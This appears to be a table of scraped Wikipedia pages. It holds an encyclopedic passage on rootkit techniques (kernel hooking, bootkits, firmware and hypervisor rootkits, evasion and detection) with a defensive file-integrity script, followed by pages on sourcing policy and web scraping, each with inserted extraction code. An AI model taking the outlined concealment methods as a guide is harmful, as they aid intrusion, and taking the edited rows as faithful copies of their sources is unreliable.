complexity makes bugs common, and any bugs in code operating at the kernel level may seriously impact system stability, leading to discovery of the rootkit. 29 One of the first widely known kernel rootkits was developed for Windows NT 4.0 and released in Phrack magazine in 1999 by Greg Hoglund. 30 31 Kernel rootkits can be especially difficult to detect and remove because they operate at the same security level as the operating system itself, and are thus able to intercept or subvert the most trusted operating system operations. Any software, such as antivirus software, running on the compromised system is equally vulnerable. 32 In this situation, no part of the system can be trusted. A rootkit can modify data structures in the Windows kernel using a method known as direct kernel object manipulation (DKOM). 33 This method can be used to hide processes. A kernel-mode rootkit can also hook the System Service Descriptor Table (SSDT), or modify the gates between user mode and kernel mode, in order to cloak itself. 4 Similarly for the Linux operating system, a rootkit can modify the system call table to subvert kernel functionality.
34 35 It is common that a rootkit creates a hidden, encrypted filesystem in which it can hide other malware or original copies of files it has infected. 36 Operating systems are evolving to counter the threat of kernel-mode rootkits. For example, 64-bit editions of Microsoft Windows now implement mandatory signing of all kernel-level drivers in order to make it more difficult for untrusted code to execute with the highest privileges in a system. 37 A kernel-mode rootkit variant called a bootkit can infect startup code like the Master Boot Record (MBR), Volume Boot Record (VBR), or boot sector, and in this way can be used to attack full disk encryption systems. 38 An example of such an attack on disk encryption is the "evil maid attack", in which an attacker installs a bootkit on an unattended computer. The envisioned scenario is a maid sneaking into the hotel room where the victims left their hardware. 39 The bootkit replaces the legitimate boot loader with one under their control. Typically the malware loader persists through the transition to protected mode when the kernel has loaded, and is thus able to subvert the kernel. 40 41 42 For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords. 43 In 2010, the Alureon rootkit successfully subverted the requirement for 64-bit kernel-mode driver signing in Windows 7 by modifying the master boot record. 44 Although not malware in the sense of doing something the user doesn't want, certain "Vista Loader" or "Windows Loader" software works in a similar way by injecting an ACPI SLIC (System Licensed Internal Code) table in the RAM-cached version of the BIOS during boot, in order to defeat the Windows Vista and Windows 7 activation process. This vector of attack was rendered useless in the (non-server) versions of Windows 8, which use a unique, machine-specific key for each system that can only be used by that one machine. 45 Many antivirus companies provide free utilities and programs to remove bootkits. Rootkits have been created as Type II hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring -1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. 6 Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. 6 A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions. 6 The "SubVirt" laboratory rootkit, developed jointly by Microsoft and University of Michigan researchers, is an academic example of a virtual-machine based rootkit (VMBR), 46 while Blue Pill software is another. In 2009, researchers from Microsoft and North Carolina State University demonstrated a hypervisor-layer anti-rootkit called Hooksafe, which provides generic protection against kernel-mode rootkits. 47 Windows 10 introduced a new feature called "Device Guard" that takes advantage of virtualization to provide independent external protection of an operating system against rootkit-type malware.
48 A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a router, network card, 49 hard drive, or the system BIOS. 27 50 The rootkit hides in firmware, because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines 51 and in a PCI expansion card ROM. 52 In October 2008, criminals tampered with European credit-card-reading machines before they were installed. The devices intercepted and transmitted credit card details via a mobile phone network. 53 In March 2009, researchers Alfredo Ortega and Anibal Sacco published details of a BIOS-level Windows rootkit that was able to survive disk replacement and operating system re-installation. 54 55 56 A few months later they learned that some laptops are sold with a legitimate rootkit, known as Absolute CompuTrace or Absolute LoJack for Laptops, preinstalled in many BIOS images. This is an anti-theft technology system that researchers showed can be turned to malicious purposes. 24 Intel Active Management Technology, part of Intel vPro, implements out-of-band management, giving administrators remote administration, remote management, and remote control of PCs with no involvement of the host processor or BIOS, even when the system is powered off. Remote administration includes remote power-up and power-down, remote reset, redirected boot, console redirection, pre-boot access to BIOS settings, programmable filtering for inbound and outbound network traffic, agent presence checking, out-of-band policy-based alerting, access to system information, such as hardware asset information, persistent event logs, and other information that is stored in dedicated memory (not on the hard drive) where it is accessible even if the OS is down or the PC is powered off. Some of these functions require the deepest level of rootkit, a second non-removable spy computer built around the main computer. Sandy Bridge and future chipsets have "the ability to remotely kill and restore a lost or stolen PC via 3G". Hardware rootkits built into the chipset can help recover stolen computers, remove data, or render them useless, but they also present privacy and security concerns of undetectable spying and redirection by management or hackers who might gain control. Rootkits employ a variety of techniques to gain control of a system; the type of rootkit influences the choice of attack vector. The most common technique leverages security vulnerabilities to achieve surreptitious privilege escalation. Another approach is to use a Trojan horse, deceiving a computer user into trusting the rootkit's installation program as benign—in this case, social engineering convinces a user that the rootkit is beneficial. 29 The installation task is made easier if the principle of least privilege is not applied, since the rootkit then does not have to explicitly request elevated (administrator-level) privileges. Other classes of rootkits can be installed only by someone with physical access to the target system. Some rootkits may also be installed intentionally by the owner of the system or somebody authorized by the owner, e.g. for the purpose of employee monitoring, rendering such subversive techniques unnecessary. 57 Some malicious rootkit installations are commercially driven, with a pay-per-install (PPI) compensation method typical for distribution. 
58 59 Once installed, a rootkit takes active measures to obscure its presence within the host system through subversion or evasion of standard operating system security tools and application programming interface (APIs) used for diagnosis, scanning, and monitoring. 60 Rootkits achieve this by modifying the behavior of core parts of an operating system through loading code into other processes, the installation or modification of drivers, or kernel modules. Obfuscation techniques include concealing running processes from system-monitoring mechanisms and hiding system files and other configuration data. 61 It is not uncommon for a rootkit to disable the event logging capacity of an operating system, in an attempt to hide evidence of an attack. Rootkits can, in theory, subvert any operating system activities. 62 The "perfect rootkit" can be thought of as similar to a "perfect crime": one that nobody realizes has taken place. Rootkits also take a number of measures to ensure their survival against detection and "cleaning" by antivirus software in addition to commonly installing into Ring 0 (kernel-mode), where they have complete access to a system. These include polymorphism (changing so their "signature" is hard to detect), stealth techniques, regeneration, disabling or turning off anti-malware software, 63 and not installing on virtual machines where it may be easier for researchers to discover and analyze them. The fundamental problem with rootkit detection is that if the operating system has been subverted, particularly by a kernel-level rootkit, it cannot be trusted to find unauthorized modifications to itself or its components. 62 Actions such as requesting a list of running processes, or a list of files in a directory, cannot be trusted to behave as expected. In other words, rootkit detectors that work while running on infected systems are only effective against rootkits that have some defect in their camouflage, or that run with lower user-mode privileges than the detection software in the kernel. 29 As with computer viruses, the detection and elimination of rootkits is an ongoing struggle between both sides of this conflict. 62 Detection can take a number of different approaches, including looking for virus "signatures" (e.g. antivirus software), integrity checking (e.g. digital signatures), difference-based detection (comparison of expected vs. actual results), and behavioral detection (e.g. monitoring CPU usage or network traffic). For kernel-mode rootkits, detection is considerably more complex, requiring careful scrutiny of the System Call Table to look for hooked functions where the malware may be subverting system behavior, 64 as well as forensic scanning of memory for patterns that indicate hidden processes. Unix rootkit detection offerings include Zeppoo, 65 chkrootkit, rkhunter and OSSEC. For Windows, detection tools include Microsoft Sysinternals RootkitRevealer, 66 Avast Antivirus, 67 Sophos Anti-Rootkit, 68 F-Secure, 69 Radix, 70 GMER, 71 and WindowsSCOPE. Any rootkit detectors that prove effective ultimately contribute to their own ineffectiveness, as malware authors adapt and test their code to escape detection by well-used tools. Notes 1 Detection by examining storage while the suspect operating system is not operational can miss rootkits not recognised by the checking software, as the rootkit is not active and suspicious behavior is suppressed; conventional anti-malware software running with the rootkit operational may fail if the rootkit hides itself effectively. 
The best and most reliable method for operating-system-level rootkit detection is to shut down the computer suspected of infection, and then to check its storage by booting from an alternative trusted medium (e.g. a "rescue" CD-ROM or USB flash drive). 72 The technique is effective because a rootkit cannot actively hide its presence if it is not running. The behavioral-based approach to detecting rootkits attempts to infer the presence of a rootkit by looking for rootkit-like behavior. For example, by profiling a system, differences in the timing and frequency of API calls or in overall CPU utilization can be attributed to a rootkit. The method is complex and is hampered by a high incidence of false positives. Defective rootkits can sometimes introduce very obvious changes to a system: the Alureon rootkit crashed Windows systems after a security update exposed a design flaw in its code. 73 74 Logs from a packet analyzer, firewall, or intrusion prevention system may present evidence of rootkit behaviour in a networked environment. 26 Antivirus products rarely catch all viruses in public tests (depending on what is used and to what extent), even though security software vendors incorporate rootkit detection into their products. Should a rootkit attempt to hide during an antivirus scan, a stealth detector may notice; if the rootkit attempts to temporarily unload itself from the system, signature detection (or "fingerprinting") can still find it. 75 This combined approach forces attackers to implement counterattack mechanisms, or "retro" routines, that attempt to terminate antivirus programs. Signature-based detection methods can be effective against well-published rootkits, but less so against specially crafted, custom-root rootkits. 62 Another method that can detect rootkits compares "trusted" raw data with "tainted" content returned by an API. For example, binaries present on disk can be compared with their copies within operating memory (in some operating systems, the in-memory image should be identical to the on-disk image), or the results returned from file system or Windows Registry APIs can be checked against raw structures on the underlying physical disks 62 76 —however, in the case of the former, some valid differences can be introduced by operating system mechanisms like memory relocation or shimming. A rootkit may detect the presence of such a difference-based scanner or virtual machine (the latter being commonly used to perform forensic analysis), and adjust its behaviour so that no differences can be detected. Difference-based detection was used by Russinovich's RootkitRevealer tool to find the Sony DRM rootkit. 1 Code signing uses public-key infrastructure to check if a file has been modified since being digitally signed by its publisher. Alternatively, a system owner or administrator can use a cryptographic hash function to compute a "fingerprint" at installation time that can help to detect subsequent unauthorized changes to on-disk code libraries. 77 However, unsophisticated schemes check only whether the code has been modified since installation time; subversion prior to that time is not detectable. The fingerprint must be re-established each time changes are made to the system: for example, after installing security updates or a service pack. The hash function creates a message digest, a relatively short code calculated from each bit in the file using an algorithm that creates large changes in the message digest with even smaller changes to the original file. 
By recalculating and comparing the message digest of the installed files at regular intervals against a trusted list of message digests, changes in the system can be detected and monitored—as long as the original baseline was created before the malware was added. More sophisticated rootkits are able to subvert the verification process by presenting an unmodified copy of the file for inspection, or by making code modifications only in memory and/or reconfiguration registers, which are later compared to a white list of expected values. 78 The code that performs hash, compare, or extend operations must also be protected—in this context, the notion of an immutable root-of-trust holds that the very first code to measure security properties of a system must itself be trusted to ensure that a rootkit or bootkit does not compromise the system at its most fundamental level. 79 Forcing a complete dump of virtual memory will capture an active rootkit (or a kernel dump in the case of a kernel-mode rootkit), allowing offline forensic analysis to be performed with a debugger against the resulting dump file, without the rootkit being able to take any measures to cloak itself. This technique is highly specialized, and may require access to non-public source code or debugging symbols. Memory dumps initiated by the operating system cannot always be used to detect a hypervisor-based rootkit, which is able to intercept and subvert the lowest-level attempts to read memory 6 —a hardware device, such as one that implements a non-maskable interrupt, may be required to dump memory in this scenario. 80 81 Virtual machines also make it easier to analyze the memory of a compromised machine from the underlying hypervisor, so some rootkits will avoid infecting virtual machines for this reason. Manual removal of a rootkit is often extremely difficult for a typical computer user, 27 but a number of security-software vendors offer tools to automatically detect and remove some rootkits, typically as part of an antivirus suite. As of 2005, Microsoft's monthly Windows Malicious Software Removal Tool is able to detect and remove some classes of rootkits. 82 83 Also, Windows Defender Offline can remove rootkits, as it runs from a trusted environment before the operating system starts. 84 Some antivirus scanners can bypass file system APIs, which are vulnerable to manipulation by a rootkit. Instead, they access raw file system structures directly, and use this information to validate the results from the system APIs to identify any differences that may be caused by a rootkit. Notes 2 85 86 87 88 There are experts who believe that the only reliable way to remove rootkits is to re-install the operating system from trusted media. 89 90 This is because antivirus and malware removal tools running on an untrusted system may be ineffective against well-written kernel-mode rootkits. Booting an alternative operating system from trusted media can allow an infected system volume to be mounted and potentially safely cleaned and critical data to be copied off—or, alternatively, a forensic examination performed. 26 Lightweight operating systems such as Windows PE, Windows Recovery Console, Windows Recovery Environment, BartPE, or Live Distros can be used for this purpose, allowing the system to be "cleaned". Even if the type and nature of a rootkit is known, manual repair may be impractical, while re-installing the operating system and applications is safer, simpler and quicker.
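As a concrete illustration of the baseline-and-recompare integrity check described above, the following minimal Python sketch computes SHA-256 digests of files under a few directories and later compares them against a stored baseline. The directory and baseline paths are hypothetical; as the text notes, such a check is only meaningful if the baseline was captured while the system was known to be clean and if the comparison is run from a trusted environment (for example, rescue media), because a kernel-mode rootkit can subvert the very file-reading APIs the script relies on.
# Minimal sketch of baseline-and-recompare file integrity checking.
# Paths are hypothetical; store the baseline on read-only or offline media.
import hashlib
import json
from pathlib import Path
WATCHED = [Path("/usr/bin"), Path("/usr/sbin")]   # hypothetical directories to watch
BASELINE = Path("/mnt/trusted/baseline.json")     # hypothetical trusted baseline store
def fingerprint(dirs):
    # Map each file path to the SHA-256 digest of its contents.
    digests = {}
    for d in dirs:
        for f in sorted(p for p in d.rglob("*") if p.is_file()):
            h = hashlib.sha256()
            with f.open("rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 20), b""):
                    h.update(chunk)
            digests[str(f)] = h.hexdigest()
    return digests
def create_baseline():
    BASELINE.write_text(json.dumps(fingerprint(WATCHED), indent=2))
def compare_to_baseline():
    baseline = json.loads(BASELINE.read_text())
    current = fingerprint(WATCHED)
    changed = [p for p in baseline if current.get(p) != baseline[p]]
    added = [p for p in current if p not in baseline]
    return changed, added
if __name__ == "__main__":
    changed, added = compare_to_baseline()
    print("Modified or missing files:", changed)
    print("Files not present in the baseline:", added)
The same caveat raised in the text applies to any such script: a detector running on a compromised system can be lied to, so the most trustworthy way to run the comparison is from an alternative, trusted boot medium.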
89 System hardening represents one of the first layers of defence against a rootkit, to prevent it from being able to install. 91 Applying security patches, implementing the principle of least privilege, reducing the attack surface and installing antivirus software are some standard security best practices that are effective against all classes of malware. 92 New secure boot specifications like UEFI have been designed to address the threat of bootkits, but even these are vulnerable if the security features they offer are not utilized. 50 For server systems, remote server attestation using technologies such as Intel Trusted Execution Technology (TXT) provide a way of verifying that servers remain in a known good state. For example, Microsoft Bitlocker's encryption of data-at-rest verifies that servers are in a known "good state" on bootup. PrivateCore vCage is a software offering that secures data-in-use (memory) to avoid bootkits and rootkits by verifying servers are in a known "good" state on bootup. The PrivateCore implementation works in concert with Intel TXT and locks down server system interfaces to avoid potential bootkits and rootkits. Another defense mechanism called the Virtual Wall (VTW) approach, serves as a lightweight hypervisor with rootkit detection and event tracing capabilities. In normal operation (guest mode), Linux runs, and when a loaded LKM violates security policies, the system switches to host mode. The VTW in host mode detects, traces, and classifies rootkit events based on memory access control and event injection mechanisms. Experimental results demonstrate the VTW's effectiveness in timely detection and defense against kernel rootkits with minimal CPU overhead (less than 2%). The VTW is compared favorably to other defense schemes, emphasizing its simplicity in implementation and potential performance gains on Linux servers. 93 |
67 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Verifiability | In the English Wikipedia, verifiability means people using the encyclopedia can check that the information comes from a reliable source. Its content is determined by previously published information rather than editors' beliefs, opinions, experiences, or previously unpublished ideas or information. Even if you are sure something is true, it must have been previously published in a reliable source before you can add it. a If reliable sources disagree with each other, then maintain a neutral point of view and present what the various sources say, giving each side its due weight. All material in Wikipedia mainspace, including everything in articles, lists, and captions, must be verifiable. Additionally, four types of information must be accompanied by an inline citation to a reliable source that directly supports b the material. The four types are: Any material that needs an inline citation but does not have one may be removed. Please immediately remove contentious material about living people (or existing groups) that is unsourced or poorly sourced. For how to write citations, see citing sources. Verifiability, no original research, and neutral point of view are Wikipedia's core content policies. They work together to determine content, so editors should understand the key points of all three. Articles must also comply with the copyright policy. All content must be verifiable. The burden to demonstrate verifiability lies with the editor who adds or restores material, and it is satisfied by providing an inline citation to a reliable source that directly supports b the contribution. c Using inline citations, provide reliable, published sources for all: The cited source must clearly support the material as presented in the article. Cite the source clearly, ideally giving page number(s)—though sometimes a section, chapter, or other division may be appropriate instead; see Wikipedia:Citing sources for details of how to do this. Any material lacking an inline citation to a reliable source that directly supports b the material may be removed and should not be restored without an inline citation to a reliable source. Whether and how quickly material should be initially removed for not having an inline citation to a reliable source depends on the material and the overall state of the article. In some cases, editors may object if you remove material without giving them time to provide references. Consider adding a citation needed tag as an interim step. d When tagging or removing material for lacking an inline citation, please state your concern that it may not be possible to find a published reliable source, and the material therefore may not be verifiable. e If you think the material is verifiable, you are encouraged to provide an inline citation yourself before considering whether to remove or tag it. Do not leave unsourced or poorly sourced material in an article if it might damage the reputation of living people 1 or existing groups, and do not move it to the talk page. You should also be aware of how Wikipedia:Biographies of living persons also applies to groups. A cited source on Wikipedia is often a specific portion of text (such as a short article or a page in a book). But when editors discuss sources (for example, to debate their appropriateness or reliability) the word source has four related meanings: All four can affect reliability. 
Base articles on reliable, independent, published sources with a reputation for fact-checking and accuracy. Source material must have been published, the definition of which for the purposes of Wikipedia is made available to the public in some form. f Unpublished materials are not considered reliable. Use sources that directly support the material presented in an article and are appropriate to the claims made. The appropriateness of any source depends on the context. Be especially careful when sourcing content related to living people or medicine. If available, academic and peer-reviewed publications are usually the most reliable sources on topics such as history, medicine, and science. Editors may also use material from reliable non-academic sources, particularly if it appears in respected mainstream publications. Other reliable sources include: Editors may also use electronic media, subject to the same criteria (see details in Wikipedia:Identifying reliable sources and Wikipedia:Search engine test). The best sources have a professional structure for checking or analyzing facts, legal issues, evidence, and arguments. The greater the degree of scrutiny given to these issues, the more reliable the source. Some newspapers, magazines, and other news organizations host online pages, columns or rolling text they call blogs. These may be acceptable sources if the writers are professionals, but use them with caution because blogs may not be subject to the news organization's normal fact-checking process. g If a news organization publishes an opinion piece in a blog, attribute the statement to the writer, e.g. "Jane Smith wrote ... Never use the blog comments that are left by the readers as sources. For personal or group blogs that are not reliable sources, see Self-published sources below. To discuss the reliability of a specific source for a particular statement, consult Wikipedia:Reliable sources Noticeboard, which seeks to apply this policy to particular cases. For a guideline discussing the reliability of particular types of sources, see Wikipedia:Reliable sources. In the case of inconsistency between this policy and the Wikipedia:Reliable sources guideline, or any other guideline related to sourcing, this policy has priority. Questionable sources are those that have a poor reputation for checking the facts, lack meaningful editorial oversight, or have an apparent conflict of interest. Such sources include websites and publications expressing views widely considered by other sources to be promotional, extremist, or relying heavily on unsubstantiated gossip, rumor, or personal opinion. Questionable sources should be used only as sources for material on themselves, such as in articles about themselves; see below. They are not suitable sources for contentious claims about others. Predatory open access journals are considered questionable due to the absence of quality control in the peer-review process. Anyone can create a personal web page, self-publish a book, or claim to be an expert. That is why self-published material such as books, patents, newsletters, personal websites, open wikis, personal or group blogs (as distinguished from newsblogs, above), content farms, Internet forum postings, and social media postings are largely not acceptable as sources. Self-published expert sources may be considered reliable when produced by an established subject-matter expert, whose work in the relevant field has previously been published by reliable, independent publications. 
g Exercise caution when using such sources: if the information in question is suitable for inclusion, someone else will probably have published it in independent, reliable sources. 2 Never use self-published sources as third-party sources about living people, even if the author is an expert, well-known professional researcher, or writer. Self-published and questionable sources may be used as sources of information about themselves, usually in articles about themselves or their activities, without the self-published source requirement that they are established experts in the field, so long as: This policy also applies to material made public by the source on social networking websites such as Twitter, Tumblr, LinkedIn, Reddit, and Facebook. Do not use articles from Wikipedia (whether English Wikipedia or Wikipedias in other languages) as sources, since Wikipedia is a user-generated source. Also, do not use websites mirroring Wikipedia content or publications relying on material from Wikipedia as sources. Content from a Wikipedia article is not considered reliable unless it is backed up by citing reliable sources. Confirm that these sources support the content, then use them directly. 3 An exception is allowed when Wikipedia itself is being discussed in the article. These may cite an article, guideline, discussion, statistic, or other content from Wikipedia (or a sister project) to support a statement about Wikipedia. Wikipedia or the sister project is a primary source in this case and may be used following the policy for primary sources. Any such use should avoid original research, undue emphasis on Wikipedia's role or views, and inappropriate self-reference. The article text should clarify how the material is sourced from Wikipedia to inform the reader about the potential bias. Do not reject reliable sources just because they are difficult or costly to access. Some reliable sources are not easily accessible. For example, an online source may require payment, and a print-only source may be available only through libraries. Rare historical sources may even be available only in special museum collections and archives. If you have trouble accessing a source, others may be able to do so on your behalf (see WikiProject Resource Exchange). Citations to non-English reliable sources are allowed on the English Wikipedia. However, because this project is in English, English-language sources are preferred over non-English ones when they are available and of equal quality and relevance. As with sources in English, if a dispute arises involving a citation to a non-English source, editors may request a quotation of relevant portions of the original source be provided, either in text, in a footnote, or on the article talk page. h (See Template:Request quotation.) If you quote a non-English reliable source (whether in the main text or in a footnote), a translation into English should accompany the quote. Translations published by reliable sources are preferred over translations by Wikipedians, but translations by Wikipedians are preferred over machine translations. When using a machine translation of source material, editors should be reasonably certain that the translation is accurate and the source is appropriate. Editors should not rely upon machine translations of non-English sources in contentious articles or biographies of living people. If needed, ask an editor who can translate it for you. 
The original text is usually included with the translated text in articles when translated by Wikipedians, and the translating editor is usually not cited. When quoting any material, whether in English or in some other language, be careful not to violate copyright; see the fair-use guideline. While information must be verifiable for inclusion in an article, not all verifiable information must be included. Consensus may determine that certain information does not improve an article. Such information should be omitted or presented instead in a different article. The responsibility for achieving consensus for inclusion is on those seeking to include disputed content. If you want to request an inline citation for an unsourced statement, you can tag a sentence with the citation needed template by writing cn or fact . Other templates exist for tagging sections or entire articles here. You can also leave a note on the talk page asking for a source, or move the material to the talk page and ask for a source there. To request verification that a reference supports the text, tag it with verification needed . Material that fails verification may be tagged with failed verification or removed. It helps other editors to explain your rationale for using templates to tag material in the template, edit summary, or on the talk page. Take special care with contentious material about living and recently deceased people. Unsourced or poorly sourced material that is contentious, especially text that is negative, derogatory, or potentially damaging, should be removed immediately rather than tagged or moved to the talk page. Any exceptional claim requires multiple high-quality sources. 4 Warnings (red flags) that should prompt extra caution include: Do not plagiarize or breach copyright when using sources. Summarize source material in your own words as much as possible; when quoting or closely paraphrasing a source, use an inline citation, and in-text attribution where appropriate. Do not link to any source that violates the copyrights of others per contributors' rights and obligations. You can link to websites that display copyrighted works as long as the website has licensed the work or uses the work in a way compliant with fair use. Knowingly directing others to material that violates copyright may be considered contributory copyright infringement. If there is reason to think a source violates copyright, do not cite it. This is particularly relevant when linking to sites such as Scribd or YouTube, where due care should be taken to avoid linking to material violating copyright. Even when information is cited to reliable sources, you must present it with a neutral point of view (NPOV). Articles should be based on thorough research of sources. All articles must adhere to NPOV, fairly representing all majority and significant-minority viewpoints published by reliable sources, in rough proportion to the prominence of each view. Tiny-minority views need not be included, except in articles devoted to them. If there is a disagreement between sources, use in-text attribution: "John Smith argues X, while Paul Jones maintains Y, followed by an inline citation. Sources themselves do not need to maintain a neutral point of view. Indeed, many reliable sources are not neutral. Our job as editors is simply to summarize what reliable sources say. If no reliable, independent sources can be found on a topic, Wikipedia should not have an article on it (i.e., the topic is not notable). 
However, notability is based on the existence of suitable sources, not on the state of sourcing in an article (WP:NEXIST). The no original research policy (NOR) is closely related to the Verifiability policy. Among its requirements are: |
68 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Main_Page | On December 8, 1963, Pan Am Flight 214 crashed near Elkton, Maryland, killing all 81 crew and passengers. Flight 214 had originated at Isla Verde International Airport in San Juan, flying to Friendship Airport near Baltimore, and then took off for Philadelphia. The crash was Pan Am's first fatal accident with the Boeing 707 121, which it had introduced to its fleet five years earlier. An investigation by the Civil Aeronautics Board concluded that the probable cause of the crash was a lightning strike that had ignited fuel vapors in one of the aircraft's fuel tanks, causing an explosion that destroyed the left wing. The exact manner of ignition was never determined, but the investigation increased awareness of how lightning can damage aircraft, leading to new regulations. The crash also led to research into the safety of several types of aviation fuel and into ways of changing the design of aircraft fuel systems to make them safer in the event of lightning strikes. (Full article...) August 17 NGC 3324 is an open cluster in the southern constellation Carina, located northwest of the Carina Nebula at a distance of 9,100 ly (2,800 pc) from Earth. The two are often confused as a single object, and together have been nicknamed the "Gabriela Mistral Nebula" due to its resemblance to the Chilean poet. NGC 3324 was first catalogued by James Dunlop in 1826. This infrared photograph by NASA’s James Webb Space Telescope shows a young, star-forming region in the western section of NGC 3324 known as the "Cosmic Cliffs". Photograph credit: NASA Wikipedia is written by volunteer editors and hosted by the Wikimedia Foundation, a non-profit organization that also hosts a range of other volunteer projects: This Wikipedia is written in English. Many other Wikipedias are available; some of the largest are listed below. |
69 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-11 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
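As a minimal illustration of the fetch-then-extract workflow described above, the sketch below reuses the requests and BeautifulSoup libraries already imported in this notebook; the target URL and the fields extracted are assumptions chosen for the example.
import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url):
    # Fetch: download the page, much as a browser would
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extract: parse the HTML and copy out the pieces of interest
    soup = BeautifulSoup(response.text, 'html5lib')
    title = soup.title.get_text(strip=True) if soup.title else ''
    links = [a.get('href') for a in soup.find_all('a', href=True)]
    return {'title': title, 'links': links}

# Hypothetical usage:
# page = fetch_and_extract('https://example.com')
# print(page['title'], len(page['links']))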
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
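The grep-style, regular-expression approach and the idea of translating pages into a relational form can both be sketched with libraries already imported in this notebook (re, pandas, StringIO). The sample HTML, the e-mail pattern, and the table layout below are assumptions for illustration only.
import re
import pandas as pd
from io import StringIO

sample_html = """
<p>Support: support@example.com, Sales: sales@example.org</p>
<table><tr><th>Product</th><th>Price</th></tr>
<tr><td>Widget</td><td>9.99</td></tr>
<tr><td>Gadget</td><td>19.99</td></tr></table>
"""

# Regular-expression extraction: a deliberately simple e-mail pattern
emails = re.findall(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}', sample_html)
print(emails)  # ['support@example.com', 'sales@example.org']

# Wrapper-like extraction into a relational form: the HTML table becomes a DataFrame
tables = pd.read_html(StringIO(sample_html))
print(tables[0])  # columns: Product, Price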
